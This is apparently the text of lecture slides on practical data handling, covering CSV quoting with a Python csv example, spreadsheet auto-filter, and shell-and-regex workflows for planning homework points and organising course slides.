▪ For a single column of data, there’s no tabs – it’s just in lines!
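To see the quoting rules in action, here is a minimal sketch using Python's built-in csv module with the three sample rows from above. It writes to an in-memory buffer rather than a real file, and sets lineterminator to "\n" for readability (the module's default is "\r\n").

```python
import csv
import io

rows = [
    ["bob", 2, 19],
    ["Jimmy, PhD", 4, 50],
    ['This is a "quote"', 7, 94],
]

# Write: the csv module adds quotes and doubles embedded quotes as needed
buf = io.StringIO()
writer = csv.writer(buf, lineterminator="\n")
writer.writerows(rows)
csv_text = buf.getvalue()
print(csv_text, end="")

# Read it back: every field comes back as a string
parsed = list(csv.reader(io.StringIO(csv_text)))
```

To produce a file Excel can open, the same writer can be pointed at open("out.csv", "w", newline="") instead of the buffer; out.csv is just an example name.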
Formulas
• Spreadsheet formulas are outside of our scope – if you aren’t
familiar, you need to learn them
Auto-filter
• Take a sheet, make sure it has headers, highlight your data, turn on
auto filter → Bam! instant sort/filter controls.
▪ Example: Requesting badge access for some students.
Putting it all together
Example data manipulation task:
Planning Homework 1
• What I have: The Homework 1 draft writeup
• My goal: Plan out point allocation for questions
• What I want: Table of question number, topic, and points
Planning Homework 1:
Acquire source data
• Select all, copy
• In shell, run “cat > q” and paste (middle-click), then Ctrl+D for EOF
Planning Homework 1:
Develop regex
Oh, I must need a perl-level regex. Switch to -P
Planning Homework 1:
Debug regex
Planning Homework 1:
Clean output
Example task: Organizing PPTs
Gathering info
• Reviewing ECE651 course content, need to organize slides
• Have syllabus and downloaded content, want to put in order
• Can’t fully automate: matching syllabus to filenames is fuzzy
• Excel can help:
$ ls > x.csv